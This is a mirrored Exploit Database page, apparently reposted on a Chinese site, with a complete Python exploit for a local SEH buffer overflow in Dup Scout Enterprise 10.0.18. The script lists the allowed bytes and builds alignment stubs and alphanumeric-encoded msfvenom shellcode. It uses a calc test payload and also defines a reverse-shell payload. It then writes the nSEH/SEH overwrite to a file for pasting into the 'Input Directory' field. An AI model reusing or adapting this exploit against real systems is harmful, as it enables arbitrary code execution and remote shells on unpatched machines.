Dup Scout Enterprise 10.0.18 – ‘Input Directory’ Local Buffer Overflow (SEH)

• Exploit Database
• 114 阅读

• 作者： Miguel Mendez Z
  日期： 2017-11-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43202/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154

  #!/usr/bin/python import struct   ######################################################################################################## # Exploit Author: Miguel Mendez Z # Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode # Date: 29-11-2017 # Software: Dup Scout Enterprise # Version: v10.0.18 # Vendor Homepage: http://www.dupscout.com # Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe # Tested on: Windows 7 x86 ########################################################################################################     &apos;&apos;&apos; [+] Paso 1 Bytes Validos: \x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a \x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f \x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65 \x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75 \x76\x77\x78\x79\x7a ---------- [+] Paso 2: Align ESP: popad * 49 ---------- [+] Paso 3: Assembly Align EAX: xor eax,eax push esp pop eax pop ecx add eax 1c jmp eax -----> (inicio shellcode) ---------- [+] Paso 4: Codificacion: and eax,554E4D4A and eax,2A313235 sub eax,65656565 sub eax,65654C65 sub eax,54363176 push eax sub eax,33354D35 sub eax,2A707737 push eax   Byte Paste: 254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50 &apos;&apos;&apos;   popad = "\x61"*49 alignEsp = popad+( "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" "\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C" "\x65\x65\x2D\x76\x31\x36\x54\x50\x2D" "\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A" "\x50" )   &apos;&apos;&apos; msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw) msfvenom -p windows/exec CMD=calc -e x86/alpha_mixedBufferRegister=EAX -f python &apos;&apos;&apos; shellcodeTest = ( "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A" "BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk" "42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw" "LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS" "wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam" "7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi" "QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB" "Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL" "eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA" )   #msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixedBufferRegister=EAX -f python shellcode= "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45" shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b" shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66" shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47" shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35" shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f" shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62" shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c" shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66" shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71" shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30" shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71" shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68" shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d" shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31" shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56" shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43" shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50" shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31" shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f" shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31" shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58" shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62" shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68" shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53" shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30" shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51" shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f" shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56" shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58" shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53" shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45" shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64" shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c" shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59" shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69" shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31" shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76" shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e" shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64" shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71" shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38" shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d" shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50" shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49" shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78" shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37" shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50" shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30" shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"   offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest)) nseh = "\x71\x20" # jno short 34 nseh+= "\x70\x20" # jo short 34 seh= struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (Bytes Buenos) junk = "\x42"*26+alignEsp+"\x42"*6000   payload = offset+nseh+seh+junk   print "\nSize Buffer: "+str(len(offset)) print "Size Payload: "+str(len(payload)) print "\n--------------EXPLOIT--------------\n" print payload print "\n----------------------------\n"   file=open(&apos;poc_dup.txt&apos;,&apos;w&apos;) file.write(payload) file.close()   # @s1kr10s